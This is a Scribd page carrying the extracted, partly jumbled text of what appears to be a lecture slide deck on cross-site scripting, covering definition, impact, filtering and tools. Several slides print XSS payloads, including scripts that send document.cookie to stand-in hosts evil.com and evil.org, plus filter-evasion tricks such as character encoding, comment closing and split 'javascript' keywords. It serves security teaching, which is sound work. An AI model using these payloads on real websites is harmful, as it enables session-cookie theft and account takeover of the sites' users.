Scribd Logo
Importer

Bienvenue sur Scribd !

  • XSS

    Transféré par

    anil
    175 vues4 pages
    Cross-site scripting (XSS) is a type of injection attack where malicious scripts are injected into trusted websites. XSS occurs when data entered by users is displayed within a web page without being validated, sanitized or encoded. This enables attackers to execute scripts in the victim's browser and steal user cookies, session tokens or other sensitive information. The document discusses examples of XSS attacks, variations, ways to circumvent input filtering, and tools that can be used to test for XSS vulnerabilities. It emphasizes that proper input validation is needed to prevent XSS and secure websites against such attacks.

    Description originale:

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Formats disponibles

    PDF, TXT ou lisez en ligne sur Scribd

    Avez-vous trouvé ce document utile ?

    Ce contenu est-il inapproprié ?

    Signaler ce document
    Cross-site scripting (XSS) is a type of injection attack where malicious scripts are injected into trusted websites. XSS occurs when data entered by users is displayed within a web page without being validated, sanitized or encoded. This enables attackers to execute scripts in the victim's browser and steal user cookies, session tokens or other sensitive information. The document discusses examples of XSS attacks, variations, ways to circumvent input filtering, and tools that can be used to test for XSS vulnerabilities. It emphasizes that proper input validation is needed to prevent XSS and secure websites against such attacks.

    Droits d'auteur :

    Attribution Non-Commercial (BY-NC)
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    175 vues4 pages

    XSS

    Transféré par

    anil
    Cross-site scripting (XSS) is a type of injection attack where malicious scripts are injected into trusted websites. XSS occurs when data entered by users is displayed within a web page without being validated, sanitized or encoded. This enables attackers to execute scripts in the victim's browser and steal user cookies, session tokens or other sensitive information. The document discusses examples of XSS attacks, variations, ways to circumvent input filtering, and tools that can be used to test for XSS vulnerabilities. It emphasizes that proper input validation is needed to prevent XSS and secure websites against such attacks.

    Droits d'auteur :

    Attribution Non-Commercial (BY-NC)
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    sur 4

    First Some Credit

    „ David Zimmer: “Real World XSS”


    article.
    „ Gunter Ollmann: “HTML Code
    Injection and XSS”
    „ Amit Klein: “XSS Explained”
    „ GNUCITIZEN.ORG
    Cross Site Scripting

    Definition of XSS Example


    „ An app level attack „ vulscript at vulsite, reads HTTP req,
    „ Involves 3 parties echoes back w/o first sanitizing…
    „ GET /vulscript.cgi?name=dylim
    „ Want diverse and personalized HTTP/1.0
    delivery Host: www.vulsite.org
    „ but web app fails to validate user „ <HTML><Title>Welcome</Title> Hi
    supplied input dylim… </HTML>
    „ Attacker can craft link which causes the
    „ Marc Slemko: XSS doesn’t have to be web browser to access vulsite, invoke
    XS, or S. vulscript, with data=evilscript.
    „ Goal: STEAL!!! „ Note that evilscript can access my
    cookies related to vulsite.

    Example cont’d Variations


    „ Such a link could be: „ Other HTML tags
    <b onMouseOver="self.location.href='http://evil.org/'"> bolded
    „ http://www.vulsite.org/vulscript.cgi?name= text</b>

    <script>alert(document.cookie)</script> „ POST, HTTP headers (referrer), path of


    HTTP req (e.g. if error page returns the
    „ Or erroneous path)
    <script>window.open(“http://evil.com/stealcoo
    kie.cgi?cookie=“+document.cookie)</script>
    „ Typical formatting
    „ <img src = "malicious.js">
    „ <script>alert('hacked')</script>
    „ <iframe = "malicious.js">
    „ <script>document.write('<img
    src="http://evil.org/'+document.cookie+'")
    </script>
    „ <a href="javascript:…">click-me</a>

    1
    Variations What about…
    „ Flash! attack… „ data:text/html;base64,PHNjcmlwdD4
    „ ActionScript, getURL() NCmFsZXJ0KCJTZWxmLWNvbnRhaW
    5lZCBYU1MiKTsNCjwvc2NyaXB0Pg==
    „ Self contained! i.e. doesn’t require
    vulnerable web resource to echo
    input.
    „ allows dynamic creation of binary files
    from JavaScript (can create files
    containing malicious payload for
    exploiting overflow vulnerabilities.)

    XSS as an attack vector Impact


    „ Strengths „ Theft of Account/Services
    Can include very large audience w one injection
    „
    point
    „ User Tracking/Stats
    „ Can force users to some action, and access info „ Browser/User exploitation
    they can access
    „ Credentialed Misinformation
    „ Can be hard to detect and slipped in quietly
    „ Can be powerful for info display and alteration. „ Free Information Dissemination

    „ Weaknesses
    „ 95% can be avoided with proper filtering on
    any user supplied data (several tools)

    Together with Phishing, etc… Securing a site


    „ Only here! By everything for „ Input sanitation
    cheap.msg „ Programmer needs to cover all possible input
    sources (query params, HTTP headers, etc)
    „ PayPal Urgent Problems with „ Useless against vulnerabilities in 3rd party
    Account Information.msg scripts/servers (e.g. err pages)
    „ Save the world.msg „ Output filtering..
    „ App firewalls
    „ Can cover all input methods in a generic way.
    „ Intercepts XSS attacks b4 they reach server.

    2
    Injection Points Filtering
    „ Active XSS attacks „ Do you want to deny users the ability
    „ Parameters passed in thru query string to use any form of HTML?
    arguments that get written directly to a „ If not, what do you filter?
    page. „ <plaintext>
    „ Any where an html form can be injected „ 10M x 10M image of attacker
    and have the user click a submit button
    „ Passive XSS attacks
    „ Database storage!
    „ Error pages!

    Filtering Many ways to circumvent


    „ Img src and href… „ Simple filtering < and >
    „ Parse out src= element and validate it: „ Use \x3c and \x3e
    „ Remove quotes „ Commenting out malicious code
    „ Deny urls with ? Querystring ids, make sure „ Just close the comment filter:
    no .cgi, .pl, etc. <script>- --></comment>…</script>
    „ Chk the protocol and deny everything except „ Separate window handling
    http „ <a href="javascript:…">click-me</a> becomes:
    <a href="javascript:…" target="_blank">click-me</a>
    „ <a href="javascript:..." foo="bar>click-me</a>
    <a href="javascript:..." foo="bar
    target="_blank">click-me</a>

    XSS tips and tricks. XSS tips and tricks..


    „ script injection in an image src tag.. „ Limited input length + script block embed
    = unlimited script power (script src=)
    „ SSL pages warn if script src comes from
    untrusted site,
    „ but if you can upload say img that is actually .js
    commands..
    „ Embed nested quotes..
    „ methods of script encoding.
    „ \’ or \”, or \u0022 \u0027
    „ <img
    „ Keyword filters that allow any js to src='vbscript:do%63ument.lo%63ation="http:/
    execute are useless: /a.b.com"'>
    „ <IMG SRC="javascript:alert('test');">
    „ A = ‘navi’; B = ‘gator.userAgent’;
    „ <IMG SRC="javasc ript:alert('test');">
    alert(eval(A+B)) „ Line break trick

    3
    Tools..
    „ AppShield, AppScan by Sanctum
    „ WebInspect
    „ Utilities by David Zimmer
    „ E.g. script encoding
    „ XSS cheat sheet
    http://ha.ckers.org/xss.html
    „ XSS Shell, Backweb, XSS proxy,
    BEEF…

    Vous aimerez peut-être aussi